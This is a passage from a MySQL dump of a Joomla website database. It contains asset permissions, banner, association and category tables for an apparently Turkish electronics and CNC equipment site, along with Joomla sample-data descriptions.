Content','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(181,179,313,314,4,'com_content.category.82','About Us','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(182,180,337,338,4,'com_content.category.83','About Us','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(183,180,339,340,4,'com_content.article.71','About Us','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(184,179,315,316,4,'com_content.article.72','About Us','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(185,34,112,113,3,'com_content.article.73','Intro','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(186,1,534,535,1,'com_djimageslider','com_djimageslider','{}'),(187,1,536,537,1,'com_jce','jce','{}'),(188,7,87,88,2,'com_contact.category.84','İletişim','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(189,7,89,90,2,'com_contact.category.85','Contacts','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(190,39,304,305,3,'com_content.article.74','Temel Elektronik','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(191,39,306,307,3,'com_content.article.75','Dalga Lehimleme','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(192,39,308,309,3,'com_content.article.76','Kurşunsuz Lehim','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(193,179,317,318,4,'com_content.article.77','Web Sitemiz %100 Yenilendi','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(194,180,341,342,4,'com_content.article.78','Our Website is restructured','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(195,179,319,320,4,'com_content.article.79','Panasonic AM100 Kampanya','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(196,180,343,344,4,'com_content.article.80','Panasonic AM100 Campaign','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(197,179,321,322,4,'com_content.article.81','Panasonic AM100 Kampanya','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(198,179,323,324,4,'com_content.article.82','Başlangıç SMD Hatları','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(199,180,345,346,4,'com_content.article.83','Starter SMD Lines','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(200,179,325,326,4,'com_content.article.84','Kester Lehimleme Malzemeleri','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(201,180,347,348,4,'com_content.article.85','Kester Soldering Material','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(202,179,327,328,4,'com_content.article.86','İkinci El Makineler','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(203,180,349,350,4,'com_content.article.87','Second-Hand Machines','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(204,1,538,539,1,'com_fields','com_fields','{}'),(205,1,540,541,1,'com_ajax','com_ajax','{}'),(206,1,542,543,1,'com_contenthistory','com_contenthistory','{}'),(207,1,544,545,1,'com_associations','com_associations','{}'),(208,1,546,547,1,'com_postinstall','com_postinstall','{}'),(209,1,548,549,1,'com_tags','com_tags','{}'),(210,1,550,551,1,'com_tcpdf','tcpdf','{}'),(211,18,403,404,2,'com_modules.module.64','Language Switcher','{}'),(212,18,405,406,2,'com_modules.module.104','jdlanguage','{}'),(213,1,552,553,1,'com_jdiction','com_jdiction','{}'),(214,18,407,408,2,'com_modules.module.105','Ürünler2','{}'),(215,18,409,410,2,'com_modules.module.91','Temsilcilikler','{}'),(216,1,554,555,1,'com_privacy','com_privacy','{}'),(217,1,556,557,1,'com_actionlogs','com_actionlogs','{}'),(218,18,411,412,2,'com_modules.module.93','Ürünler','{}'),(219,178,352,353,3,'com_content.article.88','Eko CNC Routers','{}'),(220,228,368,369,3,'com_content.article.89','PCB Kazıma/Milling','{}'),(221,16,397,398,2,'com_menus.menu.15','CNC Videolar-TR','{}'),(222,18,413,414,2,'com_modules.module.106','CNC Video','{}'),(223,228,366,367,3,'com_content.article.90','PCB Bakır-dışı Alanlar / Non-copper Areas','{}'),(224,228,364,365,3,'com_content.article.91','PCB Outline','{}'),(225,228,362,363,3,'com_content.article.92','PCB Delikleri / Holes','{}'),(226,228,360,361,3,'com_content.article.93','PCB Seviyeleme / Self-Levelling','{}'),(227,8,357,358,2,'com_content.field.1','CNC Video','{}'),(228,8,359,380,2,'com_content.category.86','CNC Video','{}'),(229,179,329,330,4,'com_content.article.94','Eko CNC Makineleri','{}'),(230,18,415,416,2,'com_modules.module.94','TopMenu-TR','{}'),(231,18,417,418,2,'com_modules.module.107','ARI Ext Menu','{}'),(232,18,419,420,2,'com_modules.module.108','CNC Video','{}'),(233,1,558,559,1,'com_jlsitemap','COM_JLSITEMAP','{}'),(234,228,370,371,3,'com_content.article.95','Ahşap İşleme / Wood processing','{}'),(235,228,372,373,3,'com_content.article.96','Akrilik İşleme / Acrylic Processing','{}'),(236,228,374,375,3,'com_content.article.97','Akrilik Oyma / Acrylic Engraving','{}'),(237,228,376,377,3,'com_content.article.98','Aluminyum işleme / Aluminum processing','{}'),(238,228,378,379,3,'com_content.article.99','Ahşap İşleme / Wood processing (120cm)','{}'),(239,18,421,422,2,'com_modules.module.96','DJ-ImageSlider','{}'),(240,1,560,561,1,'com_admintools','Admintools','{}'),(241,179,331,332,4,'com_content.article.100','Panasonic-Overview','{}'),(242,178,354,355,3,'com_content.article.101','Panasonic-Overview (2)','{}');
/*!40000 ALTER TABLE `fz6t4_assets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_associations`
--

DROP TABLE IF EXISTS `fz6t4_associations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_associations` (
  `id` int NOT NULL COMMENT 'A reference to the associated item.',
  `context` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The context of the associated item.',
  `key` char(32) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The key for the association computed from an md5 on associated ids.',
  PRIMARY KEY (`context`,`id`),
  KEY `idx_key` (`key`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_associations`
--

LOCK TABLES `fz6t4_associations` WRITE;
/*!40000 ALTER TABLE `fz6t4_associations` DISABLE KEYS */;
INSERT INTO `fz6t4_associations` VALUES (485,'com_menus.item','68497dafe0081793bd56ef1ea1406edb'),(484,'com_menus.item','68497dafe0081793bd56ef1ea1406edb'),(594,'com_menus.item','fa842b72e0b7fd1531a07083313827bc'),(593,'com_menus.item','fa842b72e0b7fd1531a07083313827bc'),(490,'com_menus.item','f703e5c4a22b52dca15e1c8878fb360d'),(492,'com_menus.item','f703e5c4a22b52dca15e1c8878fb360d'),(488,'com_menus.item','14834e659de1722aa707ce1388df24ae'),(491,'com_menus.item','14834e659de1722aa707ce1388df24ae'),(487,'com_menus.item','2992642389645515ba3b5203a21294d2'),(486,'com_menus.item','2992642389645515ba3b5203a21294d2'),(595,'com_menus.item','82cdba5a601f1dbc1b1889800d8c2056'),(596,'com_menus.item','82cdba5a601f1dbc1b1889800d8c2056'),(591,'com_menus.item','1e7ab20b2e2520ff84d704c30b41788f'),(588,'com_menus.item','1e7ab20b2e2520ff84d704c30b41788f'),(590,'com_menus.item','ba50dea3c222ae74496a385374358031'),(587,'com_menus.item','ba50dea3c222ae74496a385374358031'),(493,'com_menus.item','2b12eedea592fcf49ee4f1721e202365'),(589,'com_menus.item','2b12eedea592fcf49ee4f1721e202365');
/*!40000 ALTER TABLE `fz6t4_associations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_banner_clients`
--

DROP TABLE IF EXISTS `fz6t4_banner_clients`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_banner_clients` (
  `id` int NOT NULL AUTO_INCREMENT,
  `name` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `contact` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `email` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `extrainfo` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint NOT NULL DEFAULT '0',
  `checked_out` int unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `metakey` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `own_prefix` tinyint NOT NULL DEFAULT '0',
  `metakey_prefix` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `purchase_type` tinyint NOT NULL DEFAULT '-1',
  `track_clicks` tinyint NOT NULL DEFAULT '-1',
  `track_impressions` tinyint NOT NULL DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `idx_own_prefix` (`own_prefix`),
  KEY `idx_metakey_prefix` (`metakey_prefix`(100))
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_banner_clients`
--

LOCK TABLES `fz6t4_banner_clients` WRITE;
/*!40000 ALTER TABLE `fz6t4_banner_clients` DISABLE KEYS */;
INSERT INTO `fz6t4_banner_clients` VALUES (1,'Joomla!','Administrator','email@email.com','',1,0,'0000-00-00 00:00:00','',0,'',-1,-1,-1),(2,'Shop','Example','example@example.com','',1,0,'0000-00-00 00:00:00','',0,'',-1,0,0),(3,'Bookstore','Bookstore Example','example@example.com','',1,0,'0000-00-00 00:00:00','',0,'',-1,0,0);
/*!40000 ALTER TABLE `fz6t4_banner_clients` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_banner_tracks`
--

DROP TABLE IF EXISTS `fz6t4_banner_tracks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_banner_tracks` (
  `track_date` datetime NOT NULL,
  `track_type` int unsigned NOT NULL,
  `banner_id` int unsigned NOT NULL,
  `count` int unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`track_date`,`track_type`,`banner_id`),
  KEY `idx_track_date` (`track_date`),
  KEY `idx_track_type` (`track_type`),
  KEY `idx_banner_id` (`banner_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_banner_tracks`
--

LOCK TABLES `fz6t4_banner_tracks` WRITE;
/*!40000 ALTER TABLE `fz6t4_banner_tracks` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_banner_tracks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_banners`
--

DROP TABLE IF EXISTS `fz6t4_banners`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_banners` (
  `id` int NOT NULL AUTO_INCREMENT,
  `cid` int NOT NULL DEFAULT '0',
  `type` int NOT NULL DEFAULT '0',
  `name` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `imptotal` int NOT NULL DEFAULT '0',
  `impmade` int NOT NULL DEFAULT '0',
  `clicks` int NOT NULL DEFAULT '0',
  `clickurl` varchar(200) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `state` tinyint NOT NULL DEFAULT '0',
  `catid` int unsigned NOT NULL DEFAULT '0',
  `description` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `custombannercode` varchar(2048) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `sticky` tinyint unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  `metakey` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `params` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `own_prefix` tinyint(1) NOT NULL DEFAULT '0',
  `metakey_prefix` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `purchase_type` tinyint NOT NULL DEFAULT '-1',
  `track_clicks` tinyint NOT NULL DEFAULT '-1',
  `track_impressions` tinyint NOT NULL DEFAULT '-1',
  `checked_out` int unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `reset` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `language` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created_by` int unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int unsigned NOT NULL DEFAULT '0',
  `version` int unsigned NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `idx_state` (`state`),
  KEY `idx_own_prefix` (`own_prefix`),
  KEY `idx_banner_catid` (`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_metakey_prefix` (`metakey_prefix`(100))
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_banners`
--

LOCK TABLES `fz6t4_banners` WRITE;
/*!40000 ALTER TABLE `fz6t4_banners` DISABLE KEYS */;
INSERT INTO `fz6t4_banners` VALUES (2,3,0,'Shop 1','shop-1',0,1289,362,'http://shop.joomla.org/amazoncom-bookstores.html',1,15,'Get books about Joomla! at the Joomla! Book Shop.','',0,1,'','{\"imageurl\":\"images\\/banners\\/white.png\",\"width\":\"\",\"height\":\"\",\"alt\":\"Joomla! Books\"}',0,'',-1,0,0,0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','2011-01-01 00:00:01','en-GB',0,'','0000-00-00 00:00:00',0,1),(3,2,0,'Shop 2','shop-2',0,899003,1532,'http://shop.joomla.org',1,15,'T Shirts, caps and more from the Joomla! Shop.','',0,2,'','{\"imageurl\":\"images\\/banners\\/white.png\",\"width\":\"\",\"height\":\"\",\"alt\":\"Joomla! Shop\"}',0,'',-1,0,0,0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','2011-01-01 00:00:01','en-GB',0,'','0000-00-00 00:00:00',0,1),(4,1,0,'Support Joomla!','support-joomla',0,248,3,'http://contribute.joomla.org',1,15,'Your contributions of time, talent and money make Joomla possible.','',0,3,'','{\"imageurl\":\"images\\/banners\\/white.png\",\"width\":\"\",\"height\":\"\",\"alt\":\"\"}',0,'',-1,0,0,0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','en-GB',0,'','0000-00-00 00:00:00',0,1);
/*!40000 ALTER TABLE `fz6t4_banners` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_categories`
--

DROP TABLE IF EXISTS `fz6t4_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_categories` (
  `id` int NOT NULL AUTO_INCREMENT,
  `asset_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `parent_id` int unsigned NOT NULL DEFAULT '0',
  `lft` int NOT NULL DEFAULT '0',
  `rgt` int NOT NULL DEFAULT '0',
  `level` int unsigned NOT NULL DEFAULT '0',
  `path` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `extension` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `title` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `note` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access` int unsigned NOT NULL DEFAULT '0',
  `params` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `metadesc` varchar(1024) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'The meta description for the page.',
  `metakey` varchar(1024) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'The meta keywords for the page.',
  `metadata` varchar(2048) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'JSON encoded metadata properties.',
  `created_user_id` int unsigned NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_user_id` int unsigned NOT NULL DEFAULT '0',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int unsigned NOT NULL DEFAULT '0',
  `language` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `version` int unsigned NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `cat_idx` (`extension`,`published`,`access`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_left_right` (`lft`,`rgt`),
  KEY `idx_language` (`language`),
  KEY `idx_path` (`path`(100)),
  KEY `idx_alias` (`alias`(100))
) ENGINE=MyISAM AUTO_INCREMENT=87 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_categories`
--

LOCK TABLES `fz6t4_categories` WRITE;
/*!40000 ALTER TABLE `fz6t4_categories` DISABLE KEYS */;
INSERT INTO `fz6t4_categories` VALUES (1,0,0,0,153,0,'','system','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'{}','','','',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(9,34,1,131,132,1,'uncategorised','com_content','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'*',1),(10,35,1,129,130,1,'uncategorised','com_banners','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\",\"foobar\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(11,36,1,125,126,1,'uncategorised','com_contact','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(12,37,1,61,62,1,'uncategorised','com_newsfeeds','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(13,38,1,57,58,1,'uncategorised','com_weblinks','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(14,39,1,9,56,1,'sample-data-articles','com_content','Sample Data-Articles','sample-data-articles','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(15,40,1,127,128,1,'sample-data-banners','com_banners','Sample Data-Banners','sample-data-banners','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\",\"foobar\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(16,41,1,63,124,1,'sample-data-contact','com_contact','Sample Data-Contact','sample-data-contact','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(17,42,1,59,60,1,'sample-data-newsfeeds','com_newsfeeds','Sample Data-Newsfeeds','sample-data-newsfeeds','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(18,43,1,1,8,1,'sample-data-weblinks','com_weblinks','Sample Data-Weblinks','sample-data-weblinks','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(19,44,14,10,39,2,'sample-data-articles/joomla','com_content','Joomla!','joomla','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'*',1),(20,45,19,11,38,3,'sample-data-articles/joomla/extensions','com_content','Extensions','extensions','','<p>The Joomla! content management system lets you create webpages of various types using extensions. There are 5 basic types of extensions: components, modules, templates, languages, and plugins. Your website includes the extensions you need to create a basic website in English, but thousands of additional extensions of all types are available. The <a href=\"http://extensions.joomla.org\" style=\"color: #1b57b1; text-decoration: none; font-weight: normal;\">Joomla! Extensions Directory</a> is the largest directory of Joomla extensions.</p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-12-27 11:57:22',0,'*',1),(21,46,20,12,13,4,'sample-data-articles/joomla/extensions/components','com_content','Components','components','','<p><img class=\"image-left\" src=\"administrator/templates/bluestork/images/header/icon-48-component.png\" border=\"0\" alt=\"Component Image\" />Components are larger extensions that produce the major content for your site. Each component has one or more \"views\" that control how content is displayed. In the Joomla administrator there are additional extensions such as Menus, Redirection, and the extension managers.</p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-12-27 11:58:12',0,'*',1),(22,47,20,14,25,4,'sample-data-articles/joomla/extensions/modules','com_content','Modules','modules','','<p><img class=\"image-left\" src=\"administrator/templates/bluestork/images/header/icon-48-module.png\" border=\"0\" alt=\"Media Image\" />Modules are small blocks of content that can be displayed in positions on a web page. The menus on this site are displayed in modules. The core of Joomla! includes 24 separate modules ranging from login to search to random images. Each module has a name that starts mod_ but when it displays it has a title. In the descriptions in this section, the titles are the same as the names.</p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-12-27 11:59:44',0,'*',1),(23,48,20,26,33,4,'sample-data-articles/joomla/extensions/templates','com_content','Templates','templates','','<p><img src=\"administrator/templates/bluestork/images/header/icon-48-themes.png\" border=\"0\" alt=\"Media Image\" align=\"left\" />Templates give your site its look and feel. They determine layout, colours, typefaces, graphics and other aspects of design that make your site unique. Your installation of Joomla comes prepackaged with three front end templates and two backend templates. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Template_Manager_Templates\">Help</a></p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-12-27 12:04:51',0,'*',1),(24,49,20,34,35,4,'sample-data-articles/joomla/extensions/languages','com_content','Languages','languages','','<p><img src=\"administrator/templates/bluestork/images/header/icon-48-language.png\" border=\"0\" alt=\"Languages Image\" align=\"left\" />Joomla! installs in English, but translations of the interfaces, sample data and help screens are available in dozens of languages. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Language_Manager_Installed\">Help</a></p>\r\n<p><a href=\"http://community.joomla.org/translations.html\">Translation information</a></p>\r\n<p>If there is no language pack available for your language, instructions are available for creating your own translation, which you can also contribute to the community by starting a translation team to create an accredited translation. </p>\r\n<p>Translations of the interfaces are installed using the extensions manager in the site administrator and then managed using the language manager.</p>\r\n<p>If you have two or more languages installed you may enable the language switcher plugin and module. They should always be used together. If you create multilingual content and mark your content, menu items or modules as being in specific languages and follow <a href=\"http://docs.joomla.org/Language_Switcher_Tutorial_for_Joomla_1.6\">the complete instructions</a> your users will be able to select a specific content language using the module. By default both the plugin and module are disabled.</p>\r\n<p>Joomla 2.5 installs with a language override manager that allows you to change the specific words (such as Edit or Search) used in the Joomla application.</p>\r\n<p>There are a number of extensions that can help you manage translations of content available in the<a href=\"http://extensions.joomla.org\"> Joomla! Extensions Directory</a>.</p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2012-01-17 16:18:40',0,'*',1),(25,50,20,36,37,4,'sample-data-articles/joomla/extensions/plugins','com_content','Plugins','plugins','','<p><img src=\"administrator/templates/bluestork/images/header/icon-48-plugin.png\" border=\"0\" alt=\"Plugin Image\" align=\"left\" />Plugins are small task oriented extensions that enhance the Joomla! framework. Some are associated with particular extensions and others, such as editors, are used across all of Joomla. Most beginning users do not need to change any of the plugins that install with Joomla. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Plugin_Manager_Edit\">Help</a></p>',1,0,'0000-00-00 